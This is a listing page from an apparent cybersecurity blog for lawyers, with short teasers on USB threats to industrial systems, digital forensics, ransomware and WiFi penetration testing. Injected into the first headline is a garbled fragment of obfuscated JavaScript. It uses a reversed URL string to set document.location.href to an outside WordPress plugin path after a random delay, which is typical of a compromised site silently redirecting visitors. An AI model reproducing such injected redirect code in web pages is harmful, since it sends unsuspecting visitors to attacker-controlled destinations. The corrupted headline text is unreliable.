Cyber security for lawyers

Cyber security for lawyers

Report: USB threats toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to ICS systems have nearly doubled

The latest Honeywell USB Threat Report 2020 indicates that the number of threats specifically targeting Operational Technology systems has... read more

DFIR Briefly Expained – Part 2

Before we begin with learning how to collect digital evidence we first need to talk about “scope.” Scoping is... read more

Industrial Cybersecurity: Guidelines for Protecting Critical Infrastructure

Over the weekend, the Alpharetta-based Colonial Pipeline was hit by an extensive ransomware attack that shut down its information... read more

The State of Digital Forensics

Digital forensics is an important tool in the fight against crime in the current digital age. It is also... read more

DFIR Briefly Expained – Part 1

Since we are going to be learning in future blog posts the specifics of Digital Forensics & Incident Response... read more

Dangers of digital evidence

Here is what law enforcement is saying about the issue of contaminated digital devices. “When I was a detective and... read more

Enterprise WIFI Hacking with Hostapd-WPE

Recently we have been on Wireless Pentest with end goal to compromise the credentials of the end user and... read more

Tough Economy Heightens Insider Threat

As companies downsize, they need to keep an eye out for disgruntled employees With a faltering economy resulting in increased... read more